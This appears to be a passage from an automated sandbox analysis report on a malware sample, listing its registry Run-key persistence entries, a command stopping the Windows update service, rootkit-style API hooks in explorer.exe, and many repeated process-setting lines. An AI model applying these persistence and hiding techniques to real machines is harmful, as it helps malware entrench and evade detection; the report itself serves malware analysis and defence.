                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run based
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run based
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\ProgramData\setup.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D006F00 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00007FF67D006F00
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
